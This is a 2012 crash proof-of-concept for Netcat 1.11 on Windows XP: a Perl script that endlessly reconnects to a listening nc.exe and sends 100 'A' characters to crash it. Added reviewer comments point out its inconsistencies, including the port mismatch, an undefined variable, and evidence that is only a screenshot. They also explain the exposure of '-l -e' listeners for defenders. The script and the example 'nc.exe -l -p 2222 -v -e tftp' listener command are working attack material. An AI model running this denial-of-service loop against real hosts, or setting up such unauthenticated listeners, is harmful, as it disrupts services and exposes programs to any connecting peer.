# Exploit Title: Netcat 1.11 Crash POC
# crash:http://imageshack.us/photo/my-images/687/47003227.jpg/
# Date: July 13, 2012
# Author: coolkaveh
# [email protected]
# https://twitter.com/coolkaveh
# Vendor Homepage: The NT version was written by Weld Pond <[email protected]>
# Version: 1.11
# Tested on: windows XP SP3
# set your netcat listening on port 222 with -e switch sftp or etc ..
# example nc.exe -l -p 2222 -v -e tftp
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Crappy netcat Crash
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
# NOTE(review): the #! line is not the first line of the file, so perl
# probably does not pick up -w from it when run as `perl nc.pl` -- confirm.
#
# Reviewer notes on what this script shows and what it does not:
#
#  * Behaviour: in an endless loop it opens a TCP connection to
#    <host>:<port> (port defaults to 2222) and sends one line made of
#    100 'A' characters, a space and CRLF.  It never reads a reply.
#  * Precondition given by the author: nc.exe 1.11 on Windows XP SP3,
#    listening with -e.  The header says port 222, while the example command
#    and the default below use 2222.
#  * The page gives no root cause, debugger output or advisory id; the only
#    evidence is the linked screenshot.  Whether the fault is in nc.exe
#    itself or in the program started by -e is not established here.
#  * $poc is never assigned anywhere in the script, so it interpolates as an
#    empty string.
#  * For defenders: a listener started with -e gives every connecting peer
#    the stdin/stdout of the spawned program without authentication.  That
#    exposure exists independently of this crash, so such listeners should
#    not be reachable from untrusted networks, and a process command line
#    that combines -l and -e on nc.exe is worth alerting on.
use IO::Socket;

# Unbuffered STDOUT so the status line appears immediately.
$| = 1;

# usage: print the banner and the usage line to STDOUT.
# The usage text names only <host>; an optional second argument is accepted
# as the port (see below).
sub usage {
    print "nc.exe -l -p 2222 -v -e tftp";
    print "by coolkaveh\n";
    print "[email protected]\n";
    print "usage: perl nc.pl <host> \n";
}

# Positional arguments: host (required), port (optional, "2222" when the
# argument is missing, empty or "0").
my $target_host = shift(@ARGV);
my $target_port = shift(@ARGV) || "2222";

# Without a host there is nothing to connect to: show the banner and stop.
unless (defined $target_host) {
    usage();
    exit(0);
}

# A single test line: 100 'A' characters.
my @test_lines = ('A' x 100);

print "Crashing NC !\n";

# The connection handle lives outside the loop, so the previous socket is
# only released when the next connection attempt is assigned to it.
my $conn;

while (1) {
    for my $line (@test_lines) {
        $conn = IO::Socket::INET->new(
            PeerAddr => $target_host,
            PeerPort => $target_port,
            Proto    => 'tcp',
            Timeout  => 30,
        );

        # A failed connect is skipped silently; the loop just tries again.
        next unless defined $conn;

        # $poc is undefined (see notes above): the line sent is the
        # 100 'A's, one space, then CRLF.
        $conn->send("$line $poc\r\n", 0);
    }
}
